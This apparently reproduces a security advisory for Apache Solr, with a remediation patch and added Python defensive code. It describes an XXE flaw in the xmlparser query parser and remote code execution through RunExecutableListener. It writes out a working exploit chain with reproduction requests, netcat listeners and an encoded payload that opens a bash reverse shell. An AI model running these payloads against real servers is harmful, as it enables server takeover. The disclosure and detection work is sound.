Finger
A lonely code dog / programmer / engineer

Solr is a standalone enterprise search server with a REST-like API. You put documents into it (called "indexing") over HTTP as JSON, XML, CSV or binary. You query it over HTTP GET and receive JSON, XML, CSV or binary results.

First vulnerability: XML External Entity Expansion (deftype=xmlparser)

Lucene includes a query parser that builds complete Lucene queries from an XML data structure. Starting from version 5.1, Solr supports the "xml" query parser in search queries.

The problem is that the Lucene XML parser does not explicitly prohibit doctype declarations and the expansion of external entities. Special entities that point to external files (via file://) or external URLs (via http://) can be included in the XML document:

Example usage: http://localhost:8983/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://xxx.s.artsploit.com/xxx"'><a></a>'}

When Solr parses this request, it makes an HTTP request to http://xxx.s.artsploit.com/xxx and treats its content as the DOCTYPE definition.

Consider that we can define the parser type in the search query, which very often comes from untrusted user input, e.g. a search field on a website. This allows an external attacker to make arbitrary HTTP requests to the local Solr instance and bypass all firewall restrictions.

For example, this vulnerability could be used to send malicious data to the '/upload' handler.

This vulnerability can also be exploited as blind XXE using the ftp wrapper to read arbitrary local files from the Solr server.

Vulnerable code location:

/solr/src/lucene/queryparser/src/java/org/apache/lucene/queryparser/xml/CoreParser.java

static Document parseXML(InputStream pXmlFile) throws ParserException {
    // A default DocumentBuilderFactory allows DOCTYPE declarations and resolves
    // external entities, so an attacker-controlled document can reference
    // file:// or http:// resources.
    DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
    DocumentBuilder db = null;
    try {
        db = dbf.newDocumentBuilder();
    }
    catch (Exception se) {
        throw new ParserException("XML Parser configuration error", se);
    }
    org.w3c.dom.Document doc = null;
    try {
        doc = db.parse(pXmlFile);
    }
    // closing catch and return restored here; the excerpt as posted was cut off
    catch (Exception se) {
        throw new ParserException("Error parsing XML stream", se);
    }
    return doc;
}

Steps to reproduce:

1. Set up a listener on any port with the netcat command "nc -lv 4444"
2. Open http://localhost:8983/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://localhost:4444/execution"><a></a>'}
3. You will see the request from the Solr server on the netcat listener, proving that the DOCTYPE declaration was resolved.

Temporary remediation suggestion:

Consider adding the following lines in

/solr/src/lucene/queryparser/src/java/org/apache/lucene/queryparser/xml/CoreParser.java:

static Document parseXML(InputStream pXmlFile) throws ParserException {
    DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
    DocumentBuilder db = null;
    try {
        // protect from XXE attacks
        dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
        dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        db = dbf.newDocumentBuilder();
    }
    catch (Exception se) {
        throw new ParserException("XML Parser configuration error", se);
    }
    // ... the rest of the method is unchanged

The first feature makes the parser reject any document that carries a DOCTYPE at all, which is what blocks the SYSTEM reference shown above; the two SAX entity features are defence in depth in case a DOCTYPE is ever permitted again. setFeature throws a checked ParserConfigurationException, so the calls belong inside the try block as shown.
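The same two controls as the Java fix, shown in Python as an added example (this is not Solr or Lucene code): any DOCTYPE is refused before its subset is read, which is the equivalent of disallow-doctype-decl, and an external entity reference is never resolved. It uses the standard-library expat binding; the query document, the helper names and the placeholder host example.invalid are constructed for the demonstration and are never contacted.

```python
import xml.parsers.expat as expat


class UnsafeXmlError(ValueError):
    """Raised when a query document uses a feature the hardened parser forbids."""


def parse_query_xml(data: bytes) -> list[tuple[str, dict]]:
    """Parse an XML query document with DOCTYPE and external entities disabled.

    Returns the elements in document order as (name, attributes) pairs, i.e. the
    material a query builder would go on to interpret. The two controls mirror
    the CoreParser fix: refuse any DOCTYPE (disallow-doctype-decl) and never
    resolve an external entity (external-general/parameter-entities = false).
    """
    parser = expat.ParserCreate()
    elements: list[tuple[str, dict]] = []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # Fires as soon as <!DOCTYPE ...> is seen, before any subset is read,
        # so neither a SYSTEM URL nor an inline entity is ever processed.
        raise UnsafeXmlError(
            f"DOCTYPE not allowed in query XML (name={name!r}, system id={sysid!r})")

    def on_external_entity(context, base, sysid, pubid):
        # Second line of defence: fetch nothing even if a DOCTYPE got through.
        raise UnsafeXmlError(f"external entity reference refused: {sysid!r}")

    def on_start_element(name, attrs):
        elements.append((name, dict(attrs)))

    parser.StartDoctypeDeclHandler = on_doctype
    parser.ExternalEntityRefHandler = on_external_entity
    parser.StartElementHandler = on_start_element
    try:
        # Exceptions raised inside expat handlers propagate out of Parse().
        parser.Parse(data, True)
    except expat.ExpatError as exc:
        raise UnsafeXmlError(f"malformed query XML: {exc}") from exc
    return elements


def is_safe_query_xml(data: bytes) -> bool:
    """True when the document parses under the hardened settings, False otherwise."""
    try:
        parse_query_xml(data)
        return True
    except UnsafeXmlError:
        return False


if __name__ == "__main__":
    # Constructed inputs: a benign Lucene-style XML query and a DOCTYPE-bearing
    # one pointing at a placeholder host that is never contacted.
    benign = (b'<BooleanQuery><Clause occurs="must">'
              b'<TermQuery fieldName="title">solr</TermQuery></Clause></BooleanQuery>')
    hostile = b'<!DOCTYPE a SYSTEM "http://example.invalid/dtd"><a></a>'
    print(parse_query_xml(benign))
    print("hostile accepted:", is_safe_query_xml(hostile))
```

Python's xml.sax module exposes the same SAX feature URIs the Java patch uses (xml.sax.handler.feature_external_ges and feature_external_pes), but it has no equivalent of disallow-doctype-decl, which is why the example hooks expat's DOCTYPE callback directly.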

Second vulnerability: Remote Code Execution (add-listener: RunExecutableListener)

Solr's "RunExecutableListener" class can be used to execute arbitrary commands on specific events, for example after every update query. The problem is that such a listener can be enabled with any parameters by using the Config API with the add-listener command.

POST /solr/newcollection/config HTTP/1.1
Host: localhost:8983
Connection: close
Content-Type: application/json 
Content-Length: 198
 
{
 "add-listener" : {
 "event":"postCommit",
 "name":"newlistener",
 "class":"solr.RunExecutableListener",
 "exe":"ANYCOMMAND",
 "dir":"/usr/bin/",
 "args":["ANYARGS"]
 }
}

The parameters "exe", "args" and "dir" can be set through an HTTP request that modifies the collection's configuration. This means that anyone who can send HTTP requests to the Solr API can execute arbitrary shell commands whenever the "postCommit" event is triggered, which gives a remote attacker arbitrary remote code execution.

Steps to reproduce:

Step 1. Create a new collection:

http://localhost:8983/solr/admin/collections?action=CREATE&name=newcollection&numShards=2

Step 2. Set up a listener on any port with the netcat command "nc -lv 4444"

Step 3. Add a new RunExecutableListener listener to the collection, where the "exe" attribute contains the name of the command to run ("/usr/bin/curl") and the "args" attribute contains "http://localhost:4444/executed", so that it makes a request to the attacker's netcat listener:

POST /solr/newcollection/config HTTP/1.1
Host: localhost:8983
Connection: close
Content-Type: application/json 
Content-Length: 198
 
{
 "add-listener" : {
 "event":"postCommit",
 "name":"newlistener",
 "class":"solr.RunExecutableListener",
 "exe":"curl",
 "dir":"/usr/bin/",
 "args":["http://localhost:4444/executed"]
 }
}

Step 4. Update "newcollection" to trigger execution of the RunExecutableListener:

POST /solr/newcollection/update HTTP/1.1
Host: localhost:8983
Connection: close
Content-Type: application/json 
Content-Length: 19
 
[{"id":"test"}]

You will see the request from the Solr server on the netcat listener, proving that the curl command was executed on the server.

Summary:

By chaining these two vulnerabilities, an external attacker can achieve remote code execution even without direct access to the Solr server. The only requirement is that the attacker be able to specify part of a query that comes from the "q" search parameter (which is the case for many web applications that use Solr).

Assume an attacker can only send search queries (the "q" param) to the "/select" Solr endpoint.
Here is the full exploitation scenario:

Step 1. Create a new collection via XXE. This step can be skipped if the attacker already knows any collection name.

http://localhost:8983/solr/gettingstarted/select?q=%20%7b%21%78%6d%6c%70%61%72%73%65%72%20%76%3d%27%3c%21%44%4f%43%54%59%50%45%20%61%20%53%59%53%54%45%4d%20%22%68%74%74%70%3a%2f%2f%6c%6f%63%61%6c%68%6f%73%74%3a%38%39%38%33%2f%73%6f%6c%72%2f%61%64%6d%69%6e%2f%63%6f%6c%6c%65%63%74%69%6f%6e%73%3f%61%63%74%69%6f%6e%3d%43%52%45%41%54%45%26%6e%61%6d%65%3d%6e%65%77%63%6f%6c%6c%65%63%74%69%6f%6e%26%6e%75%6d%53%68%61%72%64%73%3d%32%22%3e%3c%61%3e%3c%2f%61%3e%27%7d%20
Without URL encoding:
 
http://localhost:8983/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://localhost:8983/solr/admin/collections?action=CREATE&name=newcollection&numShards=2"><a></a>'}
 
Step 2. Set up a netcat listener "nc -lv 4444"
 
Step 3. Add a new RunExecutableListener listener via XXE
 
http://localhost:8983/solr/newcollection/select?q=%7b%21%78%6d%6c%70%61%72%73%65%72%20%76%3d%27%3c%21%44%4f%43%54%59%50%45%20%61%20%53%59%53%54%45%4d%20%22%68%74%74%70%3a%2f%2f%6c%6f%63%61%6c%68%6f%73%74%3a%38%39%38%33%2f%73%6f%6c%72%2f%6e%65%77%63%6f%6c%6c%65%63%74%69%6f%6e%2f%73%65%6c%65%63%74%3f%71%3d%78%78%78%26%71%74%3d%2f%73%6f%6c%72%2f%6e%65%77%63%6f%6c%6c%65%63%74%69%6f%6e%2f%63%6f%6e%66%69%67%3f%73%74%72%65%61%6d%2e%62%6f%64%79%3d%25%32%35%37%62%25%32%35%32%32%25%32%35%36%31%25%32%35%36%34%25%32%35%36%34%25%32%35%32%64%25%32%35%36%63%25%32%35%36%39%25%32%35%37%33%25%32%35%37%34%25%32%35%36%35%25%32%35%36%65%25%32%35%36%35%25%32%35%37%32%25%32%35%32%32%25%32%35%33%61%25%32%35%37%62%25%32%35%32%32%25%32%35%36%35%25%32%35%37%36%25%32%35%36%35%25%32%35%36%65%25%32%35%37%34%25%32%35%32%32%25%32%35%33%61%25%32%35%32%32%25%32%35%37%30%25%32%35%36%66%25%32%35%37%33%25%32%35%37%34%25%32%35%34%33%25%32%35%36%66%25%32%35%36%64%25%32%35%36%64%25%32%35%36%39%25%32%35%37%34%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%36%65%25%32%35%36%31%25%32%35%36%64%25%32%35%36%35%25%32%35%32%32%25%32%35%33%61%25%32%35%32%32%25%32%35%36%65%25%32%35%36%35%25%32%35%37%37%25%32%35%36%63%25%32%35%36%39%25%32%35%37%33%25%32%35%37%34%25%32%35%36%35%25%32%35%36%65%25%32%35%36%35%25%32%35%37%32%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%36%33%25%32%35%36%63%25%32%35%36%31%25%32%35%37%33%25%32%35%37%33%25%32%35%32%32%25%32%35%33%61%25%32%35%32%32%25%32%35%37%33%25%32%35%36%66%25%32%35%36%63%25%32%35%37%32%25%32%35%32%65%25%32%35%35%32%25%32%35%37%35%25%32%35%36%65%25%32%35%34%35%25%32%35%37%38%25%32%35%36%35%25%32%35%36%33%25%32%35%37%35%25%32%35%37%34%25%32%35%36%31%25%32%35%36%32%25%32%35%36%63%25%32%35%36%35%25%32%35%34%63%25%32%35%36%39%25%32%35%37%33%25%32%35%37%34%25%32%35%36%35%25%32%35%36%65%25%32%35%36%35%25%32%35%37%32%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%36%35%25%32%35%37%38%25%32%35%36%35%25%32%35%32%32%25%32%35%33%61%25%32%35%32%32%25%32%35%37
%33%25%32%35%36%38%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%36%34%25%32%35%36%39%25%32%35%37%32%25%32%35%32%32%25%32%35%33%61%25%32%35%32%32%25%32%35%32%66%25%32%35%36%32%25%32%35%36%39%25%32%35%36%65%25%32%35%32%66%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%36%31%25%32%35%37%32%25%32%35%36%37%25%32%35%37%33%25%32%35%32%32%25%32%35%33%61%25%32%35%35%62%25%32%35%32%32%25%32%35%32%64%25%32%35%36%33%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%32%34%25%32%35%34%30%25%32%35%37%63%25%32%35%37%33%25%32%35%36%38%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%32%65%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%36%35%25%32%35%36%33%25%32%35%36%38%25%32%35%36%66%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%32%66%25%32%35%36%32%25%32%35%36%39%25%32%35%36%65%25%32%35%32%66%25%32%35%36%32%25%32%35%36%31%25%32%35%37%33%25%32%35%36%38%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%32%64%25%32%35%36%39%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%33%65%25%32%35%32%36%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%32%66%25%32%35%36%34%25%32%35%36%35%25%32%35%37%36%25%32%35%32%66%25%32%35%37%34%25%32%35%36%33%25%32%35%37%30%25%32%35%32%66%25%32%35%33%31%25%32%35%33%32%25%32%35%33%37%25%32%35%32%65%25%32%35%33%30%25%32%35%32%65%25%32%35%33%30%25%32%35%32%65%25%32%35%33%31%25%32%35%32%66%25%32%35%33%31%25%32%35%33%32%25%32%35%33%33%25%32%35%33%34%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%33%30%25%32%35%33%65%25%32%35%32%36%25%32%35%33%31%25%32%35%32%32%25%32%35%35%64%25%32%35%37%64%25%32%35%37%64%26%73%68%61%72%64%73%3d%6c%6f%63%61%6c%68%6f%73%74%3a%38%39%38%33%2f%22%3e%3c%61%3e%3c%2f%61%3e%27%7d
 
Without URL encoding:
 
http://localhost:8983/solr/newcollection/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://localhost:8983/solr/newcollection/select?q=xxx&qt=/solr/newcollection/config?stream.body={"add-listener":{"event":"postCommit","name":"newlistener","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c","$@|sh",".","echo","/bin/bash","-i",">&","/dev/tcp/127.0.0.1/1234","0>&1"]}}&shards=localhost:8983/"><a></a>'}
 
You may notice that in order to update the configuration we need to send a POST request to the application, but through the XXE vulnerability we can only send HTTP GET requests. There is a special trick here: if Solr receives a GET request such as "/select?q=123&qt=/xxx&shards=localhost:8983/", it actually converts it into a POST and forwards this request to the shard specified in the "shards" parameter. What is also neat is that it overrides the URL path with the "qt" parameter, so we can turn it from "/select" into "/config".
Resulting HTTP request:

Step 4. Update "newcollection" via XXE to trigger execution of the RunExecutableListener:

http://localhost:8983/solr/newcollection/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://localhost:8983/solr/newcollection/update?stream.body=[{"id":"AAA"}]&commit=true&overwrite=true"><a></a>'}

Step 5. When the “/bin/sh c $@|sh . echo /bin/bash -i >& /dev/tcp/127.0.0.1/1234 0>&1” command is executed during update, a new shell session will be opened on the netcat listener. An attacker can execute any shell command on the server where Solr is running.

In all three requests Solr responds with different errors, but all of them occur after the desired action has already been performed.
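A defender-side complement to the exploit chain, added here and not part of the original advisory: a small detector over Solr request-log lines that flags the three patterns this write-up relies on (an xmlparser local-params query carrying a DOCTYPE, a Config API body that registers a RunExecutableListener, and qt= pointing at /config together with shards=, the GET-to-POST forwarding trick), plus any direct call to the Config API, whose POST body does not appear in the log. The log lines are constructed in the shape of Solr's o.a.s.c.S.Request log and are not from any real deployment; the finding labels and function names are this example's own.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed sample lines in the shape of Solr's request log (o.a.s.c.S.Request);
# not taken from any real deployment. Line 2 carries an xmlparser/DOCTYPE query,
# line 3 is a direct Config API call (its body is not logged), line 4 is the
# qt=/config + shards= forwarding trick with a double-encoded Config API body,
# lines 1 and 5 are ordinary traffic.
SAMPLE_LOG = """\
2017-10-16 10:01:02.123 INFO  (qtp1-12) [c:gettingstarted] o.a.s.c.S.Request [gettingstarted] webapp=/solr path=/select params={q=title:solr&wt=json} hits=3 status=0 QTime=2
2017-10-16 10:01:05.456 INFO  (qtp1-13) [c:gettingstarted] o.a.s.c.S.Request [gettingstarted] webapp=/solr path=/select params={q=%7B!xmlparser+v%3D'%3C!DOCTYPE+a+SYSTEM+%22http://localhost:4444/execution%22%3E%3Ca%3E%3C/a%3E'%7D} status=500 QTime=40
2017-10-16 10:02:11.789 INFO  (qtp1-14) [c:newcollection] o.a.s.c.S.Request [newcollection] webapp=/solr path=/config params={} status=0 QTime=12
2017-10-16 10:02:20.000 INFO  (qtp1-15) [c:newcollection] o.a.s.c.S.Request [newcollection] webapp=/solr path=/select params={q=xxx&qt=/solr/newcollection/config&stream.body=%257B%2522add-listener%2522%253A%257B%2522class%2522%253A%2522solr.RunExecutableListener%2522%257D%257D&shards=localhost:8983/} status=500 QTime=7
2017-10-16 10:03:00.000 INFO  (qtp1-16) [c:newcollection] o.a.s.c.S.Request [newcollection] webapp=/solr path=/update params={stream.body=[{"id":"AAA"}]&commit=true} status=0 QTime=15
"""

LOG_RE = re.compile(
    r"path=(?P<path>\S+)\s+params=\{(?P<params>.*)\}\s+(?:hits=\d+\s+)?status=(?P<status>\d+)")

MAX_DECODE_ROUNDS = 3


def fully_decode(value: str) -> str:
    """Undo repeated percent-encoding; the chained exploit double-encodes the
    Config API body so it survives the XXE -> GET -> forwarded POST hop."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def analyze_request(path: str, raw_params: str) -> list[str]:
    """Return labels of the suspicious patterns found in one logged request."""
    findings = []
    params = parse_qs(raw_params, keep_blank_values=True)
    decoded = {k: [fully_decode(v) for v in vs] for k, vs in params.items()}
    blob = "\n".join(v for vs in decoded.values() for v in vs).lower()

    # 1. xmlparser local params with a DOCTYPE: the XXE / internal-request primitive.
    if "{!xmlparser" in blob and "<!doctype" in blob:
        findings.append("xmlparser-doctype")
    # 2. A Config API body registering a RunExecutableListener, in stream.body
    #    or any other parameter.
    if "add-listener" in blob and "runexecutablelistener" in blob:
        findings.append("run-executable-listener")
    # 3. qt= rewritten to the Config API together with shards=: the trick that
    #    turns a GET on /select into a POST on /config.
    qt = " ".join(decoded.get("qt", [])).lower()
    if "shards" in decoded and "/config" in qt:
        findings.append("qt-shards-config-forwarding")
    # 4. Direct Config API calls are logged without their body, so flag the
    #    call itself when the API is not meant to be reachable.
    if path.rstrip("/").endswith("/config"):
        findings.append("config-api-call")
    return findings


def scan_log(text: str) -> list[tuple[int, list[str]]]:
    """Scan request-log text; return (line number, findings) for flagged lines."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        match = LOG_RE.search(line)
        if not match:
            continue
        findings = analyze_request(match["path"], match["params"])
        if findings:
            hits.append((lineno, findings))
    return hits


if __name__ == "__main__":
    for lineno, findings in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {', '.join(findings)}")
```

Parameter values in the log may arrive percent-encoded, and the chained exploit encodes the Config API body a second time, so decoding is repeated until the value stops changing before any pattern is matched; a single decode would miss the smuggled add-listener body.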

All of these vulnerabilities were tested on the latest version of Apache Solr using the default cloud configuration (bin/solr start -e cloud-noprompt),